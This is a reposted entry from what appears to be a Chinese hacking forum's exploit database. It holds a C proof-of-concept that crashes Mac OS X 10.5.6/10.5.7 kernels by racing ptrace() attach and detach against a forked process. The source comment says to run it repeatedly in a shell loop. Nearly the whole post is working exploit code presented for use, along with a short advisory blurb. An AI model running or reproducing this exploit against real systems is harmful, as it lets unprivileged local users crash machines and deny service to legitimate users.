Apple Mac OSX 10.5.x - 'ptrace' Mutex Handling Local Denial of Service - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月5日3年前

// source: https://www.securityfocus.com/bid/36915/info

Apple Mac OS X is prone to a local denial-of-service vulnerability that is caused by a race condition.

Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users. 

/*
  Mac OS X 10.5.6/10.5.7 ptrace() mutex handling DoS 
  ==================================================
  This code should be run in a loop and due to problems 
  with mutex handling in ptrace a DoS can occur when a 
  destroyed mutex is attempted to be interlocked by OSX 
  kernel giving rise to a race condition. You may need
  to run this code multiple times.
  
  - Tested against 10.5.6
  - Tested against 10.5.7

  while `true`;do ./prdelka-vs-APPLE-ptracepanic;done

  This code is dedicated to a friend who I met in this
  place. Long live the exploit scene. R.I.P str0ke.

  -- prdelka
*/
#include <sys/types.h>
#include <sys/ptrace.h>
#include <stdio.h>
#include <stdlib.h>


int main(){
	pid_t pid;
	char *argv[] = {"id","","",0};
	char *envp[] = {"",0};
	pid = fork();
	if(pid == 0){
		usleep(100);
		execve("/usr/bin/id",argv,envp);
	}
	else{
		usleep(820);
		if(ptrace(PT_ATTACH,pid,0,0)==0){
			printf("[ PID: %d has been caught!\n",pid);
			if(ptrace(PT_DETACH,pid,0,0)<0){
				perror("Evil happens.");
			}
			usleep(1);
			wait(0);
			}
		else{
			perror("Fail!");
		}
	}
	return(0);
}

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Apple Mac OSX 10.5.x - 'ptrace' Mutex Handling Local Denial of Service

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索